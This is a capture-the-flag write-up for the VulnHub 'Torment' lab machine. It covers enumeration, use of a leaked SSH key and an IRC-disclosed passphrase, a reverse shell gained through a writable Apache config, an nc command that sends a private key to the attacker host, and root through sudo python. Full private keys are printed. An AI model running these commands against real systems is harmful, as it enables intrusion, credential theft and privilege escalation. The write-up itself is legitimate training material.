VulnHub Torment Writeup
Machine: https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Machine Author: Donavan
Nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 06:22 UTC
Nmap scan report for 192.168.247.134
Host is up (0.00060s latency).
Not shown: 65516 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 112640 Dec 28 2018 alternatives.tar.0
| -rw-r--r-- 1 ftp ftp 4984 Dec 23 2018 alternatives.tar.1.gz
| -rw-r--r-- 1 ftp ftp 95760 Dec 28 2018 apt.extended_states.0
| -rw-r--r-- 1 ftp ftp 10513 Dec 27 2018 apt.extended_states.1.gz
| -rw-r--r-- 1 ftp ftp 10437 Dec 26 2018 apt.extended_states.2.gz
| -rw-r--r-- 1 ftp ftp 559 Dec 23 2018 dpkg.diversions.0
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.1.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.2.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.3.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.4.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.5.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.6.gz
| -rw-r--r-- 1 ftp ftp 505 Dec 28 2018 dpkg.statoverride.0
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.1.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.2.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.3.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.4.gz
| -rw-r--r-- 1 ftp ftp 281 Dec 27 2018 dpkg.statoverride.5.gz
| -rw-r--r-- 1 ftp ftp 208 Dec 23 2018 dpkg.statoverride.6.gz
| -rw-r--r-- 1 ftp ftp 1719127 Jan 01 2019 dpkg.status.0
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.247.133
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 84:c7:31:7a:21:7d:10:d3:a9:9c:73:c2:c2:2d:d6:77 (RSA)
| 256 a5:12:e7:7f:f0:17:ce:f1:6a:a5:bc:1f:69:ac:14:04 (ECDSA)
|_ 256 66:c7:d0:be:8d:9d:9f:bf:78:67:d2:bc:cc:7d:33:b9 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: TORMENT.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25
|_http-title: Apache2 Debian Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 33239/tcp6 mountd
| 100005 1,2,3 36454/udp6 mountd
| 100005 1,2,3 49887/udp mountd
| 100005 1,2,3 50637/tcp mountd
| 100021 1,3,4 35981/tcp nlockmgr
| 100021 1,3,4 36577/udp6 nlockmgr
| 100021 1,3,4 40080/udp nlockmgr
| 100021 1,3,4 42989/tcp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE ID LITERAL+ IMAP4rev1 have capabilities AUTH=PLAIN post-login listed LOGIN-REFERRALS Pre-login IDLE SASL-IR AUTH=LOGINA0001 OK more
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Home - CUPS 2.2.1
| http-methods:
|_ Potentially risky methods: PUT
2049/tcp open nfs 3-4 (RPC #100003)
6667/tcp open irc?
6668/tcp open irc?
| fingerprint-strings:
| X11Probe:
|_ ERROR :Connection refused, too many connections from your IP address
6669/tcp open irc?
| fingerprint-strings:
| LANDesk-RC:
|_ ERROR :Connection refused, too many connections from your IP address
6672/tcp open vision_server?
| fingerprint-strings:
| DNSStatusRequestTCP, SSLSessionReq:
|_ ERROR :Connection refused, too many connections from your IP address
6674/tcp open unknown
35981/tcp open nlockmgr 1-4 (RPC #100021)
50637/tcp open mountd 1-3 (RPC #100005)
52483/tcp open mountd 1-3 (RPC #100005)
56097/tcp open mountd 1-3 (RPC #100005)
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port6668-TCP:V=7.94SVN%I=7%D=1/11%Time=67820E84%P=x86_64-pc-linux-gnu%r
SF:(X11Probe,46,"ERROR\x20:Connection\x20refused,\x20too\x20many\x20connec
SF:tions\x20from\x20your\x20IP\x20address\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port6669-TCP:V=7.94SVN%I=7%D=1/11%Time=67820E8E%P=x86_64-pc-linux-gnu%r
SF:(LANDesk-RC,46,"ERROR\x20:Connection\x20refused,\x20too\x20many\x20conn
SF:ections\x20from\x20your\x20IP\x20address\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port6672-TCP:V=7.94SVN%I=7%D=1/11%Time=67820E72%P=x86_64-pc-linux-gnu%r
SF:(DNSStatusRequestTCP,46,"ERROR\x20:Connection\x20refused,\x20too\x20man
SF:y\x20connections\x20from\x20your\x20IP\x20address\r\n")%r(SSLSessionReq
SF:,46,"ERROR\x20:Connection\x20refused,\x20too\x20many\x20connections\x20
SF:from\x20your\x20IP\x20address\r\n");
MAC Address: 00:0C:29:95:FB:63 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: TORMENT.localdomain, TORMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -2h39m51s, deviation: 4h36m55s, median: 1s
|_nbstat: NetBIOS name: TORMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: torment
| NetBIOS computer name: TORMENT\x00
| Domain name: \x00
| FQDN: torment
|_ System time: 2025-01-11T14:25:28+08:00
| smb2-time:
| date: 2025-01-11T06:25:28
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.247.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.50 seconds
So we have a lot of information here. Let’s list down the most important ones
- Port 21 - FTP: We can see that anonymous login is enabled. We should enumerate this further to see what we can find.
- Port 22 - SSH: This will likely be our way into the system once we find some credentials.
- Port 25, 143 SMTP,IMAP: We can use IMAP and SMTP to enumerate valid users, and if we are able to get credentials we could use IMAP to view emails that could contain sensitive information.
- Port 80 - HTTP: It seems that there is an http server running, we should enumerate it further to see if we can find interesting endpoints.
- Port 139,445 - SMB: It seems that SMB is also running on the server. We should see what we can do without any credentials.
- Port 631 - CUPS: This is used by the CUPS printing system. We can try and enumerate the page later to see if there is anything interesting there.
- Port 6667-7000 - IRC: This is a protocol and communication system that allows users to engage in real time text conversations.
Alright so let’s get started with our first interesting port, FTP
FTP
ftp> ls -al
229 Entering Extended Passive Mode (|||47730|)
150 Here comes the directory listing.
drwxr-xr-x 11 ftp ftp 4096 Jan 11 14:18 .
drwxr-xr-x 11 ftp ftp 4096 Jan 11 14:18 ..
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .cups
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .ftp
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .imap
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .mysql
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .nfs
drwxr-xr-x 2 ftp ftp 4096 Jan 04 2019 .ngircd
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .samba
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .smtp
drwxr-xr-x 2 ftp ftp 4096 Jan 04 2019 .ssh
<SNIP>
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44779|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 1766 Jan 04 2019 id_rsa
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||45809|)
150 Opening BINARY mode data connection for id_rsa (1766 bytes).
100% |***********************************************************************************************************************************************************************************************| 1766 4.77 MiB/s 00:00 ETA
226 Transfer complete.
1766 bytes received in 00:00 (2.31 MiB/s)
We were able to find an ssh key in the ftp server. Let’s take a look at it
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C37F0C31D1560056EA1F9204EC405986
U9X/cW7GIiI48TQAzUs5ozEQgexHKiFi2NcoADhs/ax/CTJvZh32k+izzW0mMzl1
mo5HID0qNghIbVbRcN6Zv8cdJ/AhREjy25YZ68zA7GWoyfoch1K/XY0NEnNTchLf
b6k5GEgu5jfQT+pAj1A6jQyzz4A4CGbvD+iEEJRX3qsTlAn6th6dniRORJggnVLB
K4ONTeP4US7GSGTtOD+hwoyoR4zNQKT2Hn/WryoF7LdAXMwf1aNJJJ7YPz1YdSnU
fxXscbOMlXuZ4ouawIVGeYeH85lmOh7aBy5MWsYq/vNC+2pVzVEkRfc6jug1UbdG
hncWxfU92Q47lVuqtc4HPINynD2Q8rBlYrKsEbPqtLyCnBGM/T0Srzztj+IjXUD1
SdbVLmxascquwnIyv2w55vjwJv5dKjLBmrDiY0Doc9YYCGi6cz1p9tsE+G+uRg0r
hGuFXldsYEkoQcJ4iWjsYiqcwWWFfkN+A0rYXqqcDY+aqAy+jXkhyzfmUp3KBz9j
CjR1+7KcmKvNXtjn8V+iv2Nwf+qc2YzBNkBWlwHhxIz6L8F3k3OkqnZUqPKCW2Ga
CNMcIYx3+Gde3aXpHXg4OFALV7y23N8A2h97VOqnnrnED46C39shkA8iiMNdH9mz
87TWgw+wPLbWXJO7G5nJL0qciLV/Eo6atSof3FUx/4WX4fmYeg1Rdy0KgTC1NRGn
VT/YnlBrNW3f7fdhk/YhHbcT9vCg9/Nm3hmzQX/FBP085SgeEA+ebNMzQwPmqcfb
jGpMPdhD7iLmKPwQL3RFTVODjUyzsgJ6kz83aQd80qPClopqp4NFMLwATVpbN858
d4Q0QQGrCRqu2SYaYmVhGo37BJXKE11y0JzWXOhiVLD0I9fBoHDmsKHN4Aw3lbVE
/n+B0Qa1bIMGfXP7J4r7/+4trQCGi7ngVfhtygtg6j/HcoXDy9y15zrHZqKerWd6
6ApM1caan4T0FjqlqTOQsN5GmB9sBCu02VQ1QF3Z4FVA9oW+pkNFxAeKIddG1yLM
5L1ePDgEYjik6vM1lE/65c7fNaO8dndMau4reUnPbTFqKsTA46uUaMyOV6S7nsys
kHGcAXLEzvbC8ojK1Pg5Llok6f8YN+H7cP6vE1yCfx3oU3GdWV36AgBWLON8+Wwc
icoyqfW6E2I0xz5nlHoea/7szCNBI4wZmRI+GRcRgegQvG06QvdXNzjqdezbb4ba
EXRnMddmfjFSihlUhsKxLhCmbaJk5mG2oGLHQcOurvOUPh/qgRBfUf3PTntuUoa0
0+tGGaLYibDNb5eXQ39Bsjzm8BWG/dSK/Qq7UU4Bk2bTKikWQLazPAy482BsZpWI
mXt8ISmJqldgdrtnVvG3zoQBQpspZ6HTojheNazfD4zzvduQguOcKrCNICxoSRgA
egRER+uxaLqNGz+6H+9sl7FYWalMa+VzjrEDU7PeZNgOj9PxLdKbstQLQxC/Zq6+
7kYu2pHwqP2HcXmdJ9xYnptwkuqh5WGR82Zk+JkKwUBEQJmbVxjqWLjCV/CDA06z
6VvrfrPo3xt/CoZkH66qcm9LCTcM3DsLs3UT4B7aH5wk4l5MmpVI4/mx2Dlv0Mkv
-----END RSA PRIVATE KEY-----
It seems to be encrypted. Let’s see if we can crack it using John the Ripper.
After trying a few wordlists it doesn’t seem to crack. No worries we can try and enumerate something else. I looked through the other hidden folders in the ftp server but didn’t find anything of interest.
Let’s go ahead an look at the http server for now.
HTTP
Let’s go ahead and visit the website.
We are greeted with the default apache2 page. There’s nothing special in the source code either. We can try our hand at directory busting to see what we can find.
feroxbuster -u http://192.168.247.134 -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x txt,zip,php,sh -n
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.247.134
🚀 Threads │ 100
📖 Wordlist │ /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, zip, php, sh]
🏁 HTTP methods │ [GET]
🚫 Do Not Recurse │ true
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 126l 933w 71589c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 31w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 126l 933w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 24l 127w 10355c http://192.168.247.134/icons/openlogo-75.png
200 GET 368l 933w 10701c http://192.168.247.134/
301 GET 9l 27w 310c http://192.168.247.134/manual => http://192.168.247.134/manual/
200 GET 1l 9w 61c http://192.168.247.134/secret
[####################] - 14m 1102750/1102750 0s found:4 errors:1
[####################] - 14m 1102725/1102725 1334/s http://192.168.247.134/
We were only able to find a /secret page. Let’s go ahead and visit it to see what we can find there.
There’s only this text on the page. Nothing in the source code either. We can try to see if it accepts any parameters by fuzzing it using ffuf.
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://192.168.247.134/secret?FUZZ=/etc/passwd -t 100 -ic -fs 61
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.247.134/secret?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 61
________________________________________________
:: Progress: [6453/6453] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
It seems not. I even tried it with a command as the argument, but that didn’t yield any results either
Let’s check out the Port 631 website.
Port 631 - CUPS
We are greeted with this page. I looked around but there was not much to be found except for the printers page
We could use this information to form a user list for later use. For now, let’s see if we can find something in the IRC.
Port 6667 - IRC
I was able to connect to the IRC using default credentials. I had to guess a bit here since nmap wasn’t able to pull what IRC backend was running.
irssi -c 192.168.247.134 -p 6669 -w wealllikedebian
Irssi v1.4.5 - https://irssi.org
09:07 -!- Irssi: Looking up 192.168.247.134
09:07 -!- Irssi: The following settings were initialized
09:07 real_name
09:07 -!- Irssi: Connecting to 192.168.247.134 [192.168.247.134] port 6669
09:07 Waiting for CAP LS response...
09:07 -!- Irssi: Connection to 192.168.247.134 established
09:07 -!- Capabilities requested: multi-prefix
09:07 -!- Capabilities supported: multi-prefix
09:07 -!- Capabilities acknowledged: multi-prefix
09:07 -!- Welcome to the Internet Relay Network kali!~kali@192.168.247.133
09:07 -!- Your host is irc.example.net, running version ngircd-24 (x86_64/pc/linux-gnu)
09:07 -!- This server has been started Sat Jan 11 2025 at 17:00:02 (+08)
09:07 -!- irc.example.net ngircd-24 abBcCFiIoqrRswx abehiIklmMnoOPqQrRstvVz
09:07 -!- NETWORK=TORMENT.local is my network name
09:07 -!- RFC2812 IRCD=ngIRCd CHARSET=UTF-8 CASEMAPPING=ascii PREFIX=(qaohv)~&@%+ CHANTYPES=#&+ CHANMODES=beI,k,l,imMnOPQRstVz CHANLIMIT=#&+:10 are supported on this server
09:07 -!- CHANNELLEN=50 NICKLEN=9 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY are supported on this server
09:07 -!- There are 1 users and 0 services on 1 servers
09:07 -!- 3 channels formed
09:07 -!- I have 1 users, 0 services and 0 servers
09:07 -!- 1 1 Current local users: 1, Max: 1
09:07 -!- 1 1 Current global users: 1, Max: 1
09:07 -!- Highest connection count: 10 (161 connections received)
09:07 -!- - irc.example.net message of the day
09:07 -!- - **************************************************
09:07 -!- - * H E L L O *
09:07 -!- - * This is TORMENT. Breaking us will be torture *
09:07 -!- - * for you, so why even bother trying harder? *
09:07 -!- - * TORMENT *
09:07 -!- - **************************************************
09:07 -!- End of MOTD command
09:07 -!- Mode change [+i] for user kali
09:08 -!- You're now known as pentester
09:08 -!- pentester=+~kali@192.168.247.133 pentester=+~kali@192.168.247.133
09:08 -!- Channel Users Name
09:08 -!- &SERVER 0 Server Messages
09:08 -!- #tormentedprinter 0 If you find that the printers are not printing as they should, you can configure them and check for jammed jobs by logging in with the password "mostmachineshaveasupersecurekeyandalongpassphrase".
09:08 -!- #games 0 Welcome to the Games Channel!
09:08 -!- End of LIST
[09:11] [pentester(+i)] [1:192 (change with ^X)]
[(status)]
We are able to find the password “mostmachineshaveasupersecurekeyandalongpassphrase” Using this password on the CUPS site doesn’t work. So likely we will have to use it elsewhere.
We can try using it on the ssh key to see if that is the password for that.
openssl rsa -in id_rsa
Enter pass phrase for id_rsa:
writing RSA key
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDHt/mKzgDFJoGP
kbuvTKiGcL9VdtDWSjEX1FnEmJ9b1ytfrusY6imq1JesqrVUZx/wvVpUBZGbtkuX
KbrSx9FfYEUENnA2d8iXFeVhpOkrZk0dIP3c4/VuWRj0bj22i0LmdufK5nXvV1yC
ilwKyGDyaFlPp70NXR8aWT0KoFIQVzQoZK46MqVwvlB4fr8+cWuMGYZMSK6VsCuV
JYxZzxEOTMUfp4XpQjy8w+gL/8yI8GqqIIYSLSzNXsaknh0Hib4a1MCe18xXK/Qg
0ZR5Ir+CzX21KtHQ2JxlEhmxlZm7O20lcdSzKqkU/tbNh9qeXsXJd1cDFkjc6t5P
uyEY77MNAgMBAAECggEAaKnga76jpq4UTdH4wthwpOvnSXmX3gVJjwxo8t9s/CtZ
/q3jZM4qge0hg4p+trnIglgpQ0kb0reJC7IBxz6SWeJQqPGCgvjpNUxzRmWvEGBv
XymQALeyQl8M9ePkEYsPx0lfFfUKryBgScUKkVgLfl3zGAx2xc8cYqmLlMsJ1qd/
gvCUzK95P3mTM7UXwVuXqpafDnrMIgHb1jeyi5NdnM1JohG+K/RIW1tHhiU0+QFC
H8qpXJ381oBc1kEkBKQK4syjyqD3UvDaMmtv83+P4/8YnZohW5q6jkhyyHtNV3c/
tkJVR9s/5MB+l5sOTgP9oJATg9Wo548PKCRZ0mJCPQKBgQDo8HNmSOlenfADE5kA
THSBngXDVL3IRd2MjSTRKmGRDxlOip99KrtqSAmLSkxcLYmfZW5TZd7QCOZs3dKb
P0vgmATm6Fq+ESmx7a3Ocylv6wnE72ktd/xpacOcxa58j3KlSN/Q7V08m0R7t9W2
zW8e9LKGchp12lQRTntWbnzBDwKBgQDbfZcEiTjViKwCiKLYQywBrw+RWK5pjzPI
SY/zKT3kLKW/rb7Mita5afmSPeXVP/KS4VEDsoFKZ7ik+wYTo6xIF/7P8kbtQQGK
wLgypdD5wid+VGTQHDcvrA7Y3Ucgm+RlSBc9UmYrHQHsphm7sZz4Nv1MgigleDmQ
SO+TCk3SIwKBgFOSmUSUWi4ZKhhgep9RzucGI/ktuR1We6NGrHPi6bham3DDaW9F
2pHKIKp50KWtrNekU43WWbd3yfw7JamPbxC4WeHicVQJ4lS0+ou8Y5yEzi962dh3
WPcU/BqODgkgijhkyfAyiSYKauqcTS/Vys1na3mzDG1GFK1U5AlhgJ7fAoGAChFC
ogShRLoWGa+muICsPg+HiUUmCtV0rJUjMyYLHrIlkBsqCzu7CZogxmJsblGWkMIg
8yh24bDMOVUCPFhfiJcBKwyT0EIRDgo06K3OXgZXxWWdkiYZKeicbboIjyhXW4Xo
+vkSkpusAOzFdWR6LLBpAd9edAmFqmaOBpKMaz0CgYEAvT8aAZss3rXfP4lXtVet
AF2t8+l0zjFXKomSDq0y936+HUQwwUItUkPfDB0DZ5dBlqVzV60mkHWer6VVtSau
3FOkPgiwYnZSeVLFimLuwjKxnjSop+rbfzAFEY0IFvHEZZG+0wbvFW7gMsOlJcBs
p5t0aXErR4yEZAl331IUu1Q=
-----END PRIVATE KEY-----
There we go, we are able to obtain the decrypted ssh key using that password. Now we need to figure out what user to ssh as. We can try logging in as the users identified in the printers page. After trying out a few of them, the patrick username seems to work.
ssh patrick@192.168.247.134 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jan 11 17:45:58 2025 from 192.168.247.131
patrick@TORMENT:~$
patrick@TORMENT:~$ sudo -l
Matching Defaults entries for patrick on TORMENT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on TORMENT:
(ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
It seems we have the ability to poweroff, halt and reboot the system. This doesn’t help us much in terms of priv esc but let’s keep it in mind for later.
After a while I wasn’t able to find anything manually, so I decided to use linpeas to see if I could notice something I didn’t earlier.
══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/apache2/apache2.conf
/home/patrick
/run/lock
/run/user/1001
<SNIP>
It seems we are able to write to the apache2.conf file. Paired with the ability to reboot the system we can use this to escalate our privileges.
patrick@TORMENT:~$ ls ..
patrick qiu
patrick@TORMENT:~$
We have another user called qiu. We can modify the apache2.conf to run as qiu and then we can add a php-rev shell to the web directory to get a shell as qiu.
# These need to be set in /etc/apache2/envvars
User qiu
Group qiu
After modifying it all we need to do is run our rev shell and get a shell back.
nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.247.131] from (UNKNOWN) [192.168.247.134] 42168
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
18:39:10 up 0 min, 0 users, load average: 1.48, 0.42, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
$
And there we go, we now have a shell as qiu. Let’s go ahead and get a more interactive shell and perform some more enumeration. It seems qiu doesn’t have an ssh key setup, we can set one up so that we can connect and get a better shell.
$ ssh-keygen -b 2048 -t rsa -f ./id_rsa -q -N ""
$ ls
id_rsa
id_rsa.pub
$ nc 192.168.247.131 4243 < id_rsa
$ mv id_rsa.pub authorized_keys
ssh qiu@192.168.247.134 -i qiu_key
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
qiu@TORMENT:~$
There we go, we now have a proper shell.
qiu@TORMENT:~$ sudo -l
Matching Defaults entries for qiu on TORMENT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User qiu may run the following commands on TORMENT:
(ALL) NOPASSWD: /usr/bin/python, /bin/systemctl
It seems we are able to run python with sudo. With this we should easily be able to get a shell as root.
qiu@TORMENT:~$ sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
root@TORMENT:/home/qiu# id
uid=0(root) gid=0(root) groups=0(root)
root@TORMENT:/home/qiu#
There we go we now have root.
root@TORMENT:~# cat proof.txt
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)
Until then, try harder!
Final Thoughts
This truly was an amazing box. It had me interacting with a service I hadn’t before (IRC). It also showed me a new privilege escalation tactic that I hadn’t encountered before. This just goes to show how much I have yet to learn, and how important Enumeration truly is.